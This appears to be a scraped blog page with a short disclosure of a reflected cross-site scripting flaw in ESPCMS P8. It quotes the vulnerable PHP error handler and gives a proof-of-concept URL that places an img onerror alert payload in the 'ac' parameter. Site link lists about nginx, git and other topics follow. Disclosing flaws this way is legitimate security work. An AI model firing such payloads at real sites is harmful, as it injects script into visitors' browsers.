Download the source code first

In the directory espcms_web\espcms_load.php line 67

if (!is_file($module_filename)) {

    espcms_message_err('public_pack-espcms_module_file_err', array($ac_name));

}

Will return the html code directly

function espcms_message_err($message_code, $format_code = array()) {

    $title = espcms_lan_pack('public_pack-espcms_soft_title_err');

    $message_lan = espcms_lan_pack($message_code);

    if (isset($message_lan) && !empty($message_lan) && is_array($format_code) && count($format_code) > 0) {

        $message = vsprintf($message_lan, $format_code);

    } else {

        $message = $message_lan;

    }

    $message_html_code = '<!DOCTYPE html>

    <html xmlns="http://www.w3.org/1999/xhtml" dir=\'ltr\'>

    <head>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

        <title>' . $title . '</title>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/jquery.min.js"></script>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/iframeResizer.contentWindow.min.js"></script>

        <style type="text/css">

            html {

                background: #eee;

            }

            body {

                background: #fff;

                color: #333;

                font-family: "Open Sans", sans-serif;

                margin: 2em auto;

                padding: 20px;

                max-width: 92%;

                -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.13);

                box-shadow: 0 1px 3px rgba(0,0,0,0.13);

            }

            h1 {

                border-bottom: 1px solid #dadada;

                clear: both;

                color: #666;

                font: 24px "Open Sans", sans-serif;

                margin: 30px 0 0 0;

                padding: 0;

                padding-bottom: 7px;

            }

            #error-page {

                margin-top:40px;

            }

            #error-page p {

                font-size: 14px;

                line-height: 1.5;

                margin: 25px 0 20px;

            }

            #error-page code {

                font-family: Consolas, Monaco, monospace;

            }

            ul li {

                margin-bottom: 10px;

                font-size: 14px ;

            }

            a {

                color: #333;

                text-decoration: underline;

            }

            a:hover {

                color: #fa0000;

                text-decoration: underline;

            }

            .button {

                background: #f7f7f7;

                border: 1px solid #cccccc;

                color: #555;

                display: inline-block;

                text-decoration: none;

                font-size: 13px;

                line-height: 26px;

                height: 28px;

                margin: 0;

                padding: 0 10px 1px;

                cursor: pointer;

                -webkit-border-radius: 3px;

                -webkit-appearance: none;

                border-radius: 3px;

                white-space: nowrap;

                -webkit-box-sizing: border-box;

                -moz-box-sizing:    border-box;

                box-sizing:         border-box;

                -webkit-box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                vertical-align: top;

            }

            .button.button-large {

                height: 29px;

                line-height: 28px;

                padding: 0 12px;

            }

            .button:hover,

            .button:focus {

                background: #fafafa;

                border-color: #999;

                color: #222;

            }

            .button:focus  {

                -webkit-box-shadow: 1px 1px 1px rgba(0,0,0,.2);

                box-shadow: 1px 1px 1px rgba(0,0,0,.2);

            }

            .button:active {

                background: #eee;

                border-color: #999;

                color: #333;

                -webkit-box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

                box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

            }

            code {

                font-size:14px;padding:0px 5px;color:#eb3609;

            }

        </style>

    </head>

    <body id="error-page">' . $message . '</body></html>';

    exit($message_html_code);

}

Directly cause cross-site scripting

We request directly

http://127.0.0.1/espcms/index.php?ac=<img src=1 onerror=alert(1)>&at=List

ESPCMS P8 stable version Front-end reflective xss的更多相关文章

  1. nginx的Mainline version、Stable version、Legacy version

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  2. nginx的MainLine version、Stable version、Legacy versions

    Nginx的版本说明Mainline version:在线版本,正处于开发状态Stable version :稳定版本(一般下载使用)Legacy version :遗留版本,遗留的老的版本 Linu ...

  3. nginx的Mainline version、Stable version、Legacy version的版本区别

    nginx的Mainline version.Stable version.Legacy version的版本区别 创建时间:2014-01-16 10:30:37最后修改:2014-09-23 20 ...

  4. Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer.

    Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer. Release date: ...

  5. espcms P8.19082801 vulnerability

    author: naiquan chai Net name:Hanamizuki花水木 Through  the vulnerability  we can get the webshell if w ...

  6. 编译安装redis-3.2.9(latest stable version)

    What is the Redis? Redis is an open source (BSD licensed), in-memory data structure store, used as a ...

  7. Mainline/Stable/Legacy

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  8. 一个新的Android Studio 2.3.3可以在稳定的频道中使用。A new Android Studio 2.3.3 is available in the stable channel.

    作者:韩梦飞沙 Author:han_meng_fei_sha 邮箱:313134555@qq.com E-mail: 313134555 @qq.com 一个新的Android Studio 2.3 ...

  9. Nginx官方版本说明##Mainline &Stable&Legacy versions

    Nginx (Mainline Stable Legacy)区别 Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发 ...

随机推荐

  1. 上手spring boot项目(三)之spring boot整合mybatis进行增删改查的三种方式。

    1.引入依赖. <!--springboot的web起步依赖--><dependency> <groupId>org.springframework.boot< ...

  2. 成功build Maven但eclipse中依然显示该工程有错误

    在mac pro的控制台中,成功执行 mvn package,但该工程在eclipse仍然显示有错误. 解决办法:右键该工程 -> Maven -> Update project,勾选 F ...

  3. git 使用详解(9)-- 分支的新建与合并 git branch -d、merge、 --merged/--no-merged/-v

    现在让我们来看一个简单的分支与合并的例子,实际工作中大体也会用到这样的工作流程: 开发某个网站. 为实现某个新的需求,创建一个分支. 在这个分支上开展工作. 假设此时,你突然接到一个电话说有个很严重的 ...

  4. Java修炼——异常的概念以及处理方式(捕获异常)

    异常概念分类 异常( Exception 也称例外)就是在程序的运行过程中 所发生的不正常的事件,它会中断正在运行的程序  所需文件找不到  网络连接不通或中断  算术运算错 (被零除-)  ...

  5. iSensor App Kit 测试之 MT9V111 MT9M111 MT9D111

    iSensor App Kit 可以调试测试一切常规的sensor,对于ccusb20底板,可以直接兼容官哥所有的dvp接口的摄像头,分辨率从30w到1400w均没问题. 今天又测试了三款sensor ...

  6. SpringBoot学习【一】----- HelloWord

    springboot是什么 Spring Boot可以轻松创建可以运行的独立的,生产级的基于Spring的应用程序. 大多数Spring Boot应用程序只需要很少的Spring配置. 提供了一个运行 ...

  7. robot_framework常用关键字

    快捷键 F8 运行 ctrl+alt+空格 log 类似于print Set variable 定义变量 Catenate 连接对象 SEPARATOR 对多个连接信息进行分割 Create List ...

  8. 【JPA】字段访问、属性访问及混合访问

    [JPA]字段访问.属性访问及混合访问 转载:https://www.cnblogs.com/yangchongxing/p/10120318.html 1.字段访问 注解字段,通过反射来获得和设置字 ...

  9. 在Atmel Studio7中创建ASF项目

    使用ASF自带例程的方式创建程序是很方便,但是因为系统例程支持的ATMEL开发板往往和用户板配置不同,所以我们需要自己创建项目.下面介绍在AS7.0中快速创建一个ASF项目的方法. 1.首先从菜单开始 ...

  10. 搞了一次IE浏览器兼容,我有点奔溃....

    浏览器兼容问题(主要时IE上遇到的坑坑坑) caniuse 工具(基本参考作用,实际还是需要测试) (1)安装babel-polyfill基本操作了,IE浏览器没有内置Promise对象,不仅如此,几 ...